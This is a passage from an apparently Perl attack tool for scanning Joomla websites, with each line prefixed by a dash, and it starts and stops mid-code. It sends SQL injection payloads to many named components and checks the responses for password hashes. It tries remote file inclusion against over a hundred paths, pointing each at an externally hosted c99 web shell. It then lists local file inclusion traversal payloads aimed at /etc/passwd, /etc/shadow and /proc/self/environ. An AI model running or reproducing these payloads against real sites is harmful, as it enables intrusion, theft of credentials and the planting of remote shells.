- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_acteammember) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_acstartseite&Itemid=999 .$com_acstartseite.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_acstartseite) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_productbook&Itemid=999&func=detail&id=-999 .$com_productbook.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_productbook) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_yelp&controller=showdetail&task=showdetail&cid=-999 .$com_yelp.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_yelps) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_yelp&controller=showdetail&task=showdetail&cid=-999 .$com_yelp.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_yelps) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_dms&task=view_category&category_id=-999 .$com_dms.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_dms) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/administrator/index.php?option=com_jbpublishdownfp&task=edit&cid[]=-999 .$com_jbpublishdownfp.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_jbpublishdownfp) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
- $b->agent('Mozilla/5.0 (compatible; MSIE 7.0; Windows)');
- $host = $target . "/administrator/index.php?option=com_casino&task=category&id=-999 .$com_casino.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_casino) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_doqment&cid=-999 .$com_doqment.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_doqment) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_alfresco&task=edit&id_pan=999 .$com_alfresco.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_alfresco) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_countries&locat=999 .$com_countries.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_countries) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- }
- if($c eq '4')
- {
- system('cls');
- system('title JOomla Rfi Scanner');
- @RFI = ("/components/com_flyspray/startdown.php?file=",
- "/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=",
- "/components/com_simpleboard/file_upload.php?sbp=",
- "/components/com_hashcash/server.php?mosConfig_absolute_path=",
- "/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=",
- "/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=",
- "/components/com_performs/performs.php?mosConfig_absolute_path=",
- "/components/com_forum/download.php?phpbb_root_path=",
- "/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=",
- "/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=",
- "/components/minibb/index.php?absolute_path=",
- "/components/com_smf/smf.php?mosConfig_absolute_path=",
- "/modules/mod_calendar.php?absolute_path=",
- "/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=",
- "/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=",
- "/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=",
- "/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=",
- "/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=",
- "/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=",
- "/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=",
- "/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=",
- "/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=",
- "/components/com_securityimages/configinsert.php?mosConfig_absolute_path=",
- "/components/com_securityimages/lang.php?mosConfig_absolute_path=",
- "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=",
- "/components/com_galleria/galleria.html.php?mosConfig_absolute_path=",
- "/akocomments.php?mosConfig_absolute_path=",
- "/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=",
- "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=",
- "/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=",
- "/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=",
- "/components/com_zoom/includes/database.php?mosConfig_absolute_path=",
- "/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=",
- "/components/com_fm/fm.install.php?lm_absolute_path=",
- "/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=",
- "/components/com_lmo/lmo.php?mosConfig_absolute_path=",
- "/administrator/components/com_webring/admin.webring.docs.php?component_dir=",
- "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=",
- "/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=",
- "/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=",
- "/components/com_mambowiki/MamboLogin.php?IP=",
- "/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=",
- "/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=",
- "/components/com_cpg/cpg.php?mosConfig_absolute_path=",
- "/components/com_moodle/moodle.php?mosConfig_absolute_path=",
- "/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=",
- "/components/com_mospray/scripts/admin.php?basedir=",
- "/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=",
- "/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=",
- "/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=",
- "/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=",
- "/components/com_madeira/img.php?url=",
- "/components/com_bsq_sitestats/external/rssfeed.php?baseDir=",
- "/com_bsq_sitestats/external/rssfeed.php?baseDir=",
- "/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=",
- "/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=",
- "/administrator/components/admin.jjgallery.php?mosConfig_absolute_path=",
- "/components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=",
- "/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=",
- "/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=",
- "/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=",
- "/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=",
- "/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=",
- "/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=",
- "/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=",
- "/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=",
- "/index.php?option=com_custompages&cpage=",
- "/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=",
- "/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=",
- "/components/com_facileforms/facileforms.frame.php?ff_compath=",
- "/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=",
- "/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=",
- "/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=",
- "/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=",
- "/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=",
- "/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=",
- "/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=",
- "/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=",
- "/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=",
- "/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=",
- "/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=",
- "/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=",
- "/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=",
- "/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=",
- "/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=",
- "/administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=",
- "/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=",
- "/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=",
- "/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=",
- "/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=",
- "/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=",
- "/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=",
- "/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=",
- "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=",
- "/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=",
- "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=",
- "/components/com_reporter/reporter.logic.php?mosConfig_absolute_path=",
- "/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=",
- "/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=",
- "/components/com_joomlaboard/file_upload.php?sbp=",
- "/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=",
- "/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=",
- "/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=",
- "/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=",
- "/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=",
- "/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=",
- "/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=",
- "/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=",
- "/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=",
- "/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=",
- "/modules/mod_as_category.php?mosConfig_absolute_path=",
- "/components/com_articles.php?absolute_path=",
- "/classes/html/com_articles.php?absolute_path=",
- "/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=",
- "/templates/be2004-2/index.php?mosConfig_absolute_path=",
- "/libraries/pcl/pcltar.php?g_pcltar_lib_dir=",
- "/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=",
- "/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=",
- "/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=",
- "/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=",
- "/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=",
- "/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=",
- "/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=",
- "/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=",
- "/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=",
- "/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=",
- "/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=",
- "/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=",
- "/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=",
- "/components/com_mp3_allopass/allopass.php?mosConfig_live_site=",
- "/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=",
- "/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=",
- "/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=",
- "/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=",
- "/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=",
- "/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=",
- "/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=",
- "/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=",
- "/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=",
- "/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=",
- "/administrator/components/com_color/admin.color.php?mosConfig_live_site=",
- "/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=",
- "/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=",
- "/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=",
- "/index.php?option=com_adsmanager&mosConfig_absolute_path=",
- "/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=",
- "/com_magazine_3_0_1/magazine.functions.php?config=",
- "/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=",
- "/administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=",
- "/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=");
- print "Please Enter Target [http://www.site.com]";
- print "\n\n Target:";
- $Target=<STDIN>;
- chomp ($Target);
- print"\n\n \t\t Please wait";
- sleep(2);
- print"\n";
- foreach $RFI(@RFI){
- my $URL =$Target.$RFI."http://www.sh3ll.org/c99.txt";
- my $Source = get $URL;
- die "Can not get $URL" unless defined $URL;
- if ($Source =~ /c99shell/ || /safe_mode/ || /Executed / || /Shell/){ $Message ="RFI Vulnerability FOUND";}
- else { $Message = "NOT FOUND RFI Vulnerability";}
- print "\n \n \n \n \t \t \t \t FINISH ";
- print "\n $URL => $Message \n";
- open (TEXT, '>>RFI.txt');
- print TEXT "\n $URL => $Message \n\n";
- close (TEXT);
- print 'result in RFI.txt';
- }
- }
- if($c eq '3')
- {
- system('cls');
- system('title Joomla LFI Scanner');
- @LFI =("/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","....//etc/passwd","....//....//etc/passwd","....//....//....//etc/passwd","....//....//....//....//etc/passwd","....//....//....//....//....//etc/passwd","....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//....//....//etc/passwd","....//etc/passwd%00","....//....//etc/passwd%00","....//....//....//etc/passwd%00","....//....//....//....//etc/passwd%00","....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/passwd%00","%2Fetc%2Fpasswd","..%2Fetc%2Fpasswd","..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","%2Fetc%2Fpasswd%00","..%2Fetc%2Fpasswd%00","..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","....%2f%2Fetc/passwd","....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","/proc/self/environ","../proc/self/environ","../../proc/self/environ","../../../proc/self/environ","../../../../proc/self/environ","../../../../../proc/self/environ","../../../../../../proc/self/environ","../../../../../../../proc/self/environ","../../../../../../../../proc/self/environ","../../../../../../../../../proc/self/environ","../../../../../../../../../../proc/self/environ","/proc/self/environ%00","../proc/self/environ%00","../../proc/self/environ%00","../../../proc/self/environ%00","../../../../proc/self/environ%00","../../../../../proc/self/environ%00","../../../../../../proc/self/environ%00","../../../../../../../proc/self/environ%00","../../../../../../../../proc/self/environ%00","../../../../../../../../../proc/self/environ%00","../../../../../../../../../../proc/self/environ%00","%2Fproc%2Fself%2Fenviron","..%2Fproc%2Fself%2Fenviron","..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","%2Fproc%2Fself%2Fenviron%00","..%2Fproc%2Fself%2Fenviron%00","..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","//proc/self/environ","....//proc/self/environ","....//....//proc/self/environ","....//....//....//proc/self/environ","....//....//....//....//proc/self/environ","....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//....//....//proc/self/environ","//proc/self/environ%00","....//proc/self/environ%00","....//....//proc/self/environ%00","....//....//....//proc/self/environ%00","....//....//....//....//proc/self/environ%00","....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//....//....//proc/self/environ%00","%2f%2Fproc/self/environ","....%2f%2Fproc/self/environ","....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","%2f%2Fproc/self/environ%00","....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","/etc/shadow","../etc/shadow","../../etc/shadow","../../../etc/shadow","../../../../etc/shadow","../../../../../etc/shadow","../../../../../../etc/shadow","../../../../../../../etc/shadow","../../../../../../../../etc/shadow","../../../../../../../../../etc/shadow","../../../../../../../../../../etc/shadow","/etc/shadow%00","../etc/shadow%00","../../etc/shadow%00","../../../etc/shadow%00","../../../../etc/shadow%00","../../../../../etc/shadow%00","../../../../../../etc/shadow%00","../../../../../../../etc/shadow%00","../../../../../../../../etc/shadow%00","../../../../../../../../../etc/shadow%00","../../../../../../../../../../etc/shadow%00","%2Fetc..%2Fshadow","..%2Fetc%2Fshadow","..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","%2Fetc..%2Fshadow%00","..%2Fetc%2Fshadow%00","..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","%2F%2Fetc/shadow","....%2f%2Fetc/shadow","....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","%2F%2Fetc/shadow%00","....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....